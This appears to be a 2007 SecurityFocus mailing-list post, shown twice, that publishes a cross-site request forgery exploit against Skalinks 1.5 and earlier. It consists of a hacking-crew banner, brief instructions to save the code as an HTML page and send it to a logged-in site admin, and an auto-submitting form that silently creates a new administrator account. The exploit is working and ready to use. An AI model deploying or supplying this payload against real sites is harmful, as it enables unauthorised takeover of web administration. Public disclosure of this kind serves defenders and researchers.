Back to list
|
Post reply
Skalinks <= 1_5 Cross Site Request Forgery Add Admin
Nov 03 2007 11:09PM
djvincy hotmail it
########################################################################
##
# _ _ _ _ _____ _ _ #
# | | | | | | (_) |_ _| (_) | | #
# | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ #
# | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ #
# | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ #
# \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| #
# __/ | #
# |___/ #
#_______________________________________________________________________
_#
| |
| Site: www.hackinginside.altervista.org |
| Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin |
| Author: Vincy |
| Email: djvincy (at) hotmail (dot) it [email concealed] |
|_______________________________________________________________________
_|
This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info.
It work only if admin's logged.
------------------------------------------------------------------------
-------------------
<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">
<input type="text" name="admin_name" value="[ NOME ]">
<input type="text" name="admin_password" value="[ PASSWORD ]">
<input type="text" name="admin_email" value="[ EMAIL ]">
<select name="admin_type"><option value="2">Super Editor</option></select>
<input type=hidden name="Add_admin" value="Add Admin">
</form>
<script>document.add_admin.submit()</script>
------------------------------------------------------------------------
-------------------
# Vincy - Hacking Inside Crew
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
##
# _ _ _ _ _____ _ _ #
# | | | | | | (_) |_ _| (_) | | #
# | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ #
# | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ #
# | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ #
# \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| #
# __/ | #
# |___/ #
#_______________________________________________________________________
_#
| |
| Site: www.hackinginside.altervista.org |
| Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin |
| Author: Vincy |
| Email: djvincy (at) hotmail (dot) it [email concealed] |
|_______________________________________________________________________
_|
This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info.
It work only if admin's logged.
------------------------------------------------------------------------
-------------------
<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">
<input type="text" name="admin_name" value="[ NOME ]">
<input type="text" name="admin_password" value="[ PASSWORD ]">
<input type="text" name="admin_email" value="[ EMAIL ]">
<select name="admin_type"><option value="2">Super Editor</option></select>
<input type=hidden name="Add_admin" value="Add Admin">
</form>
<script>document.add_admin.submit()</script>
------------------------------------------------------------------------
-------------------
# Vincy - Hacking Inside Crew
[ reply ]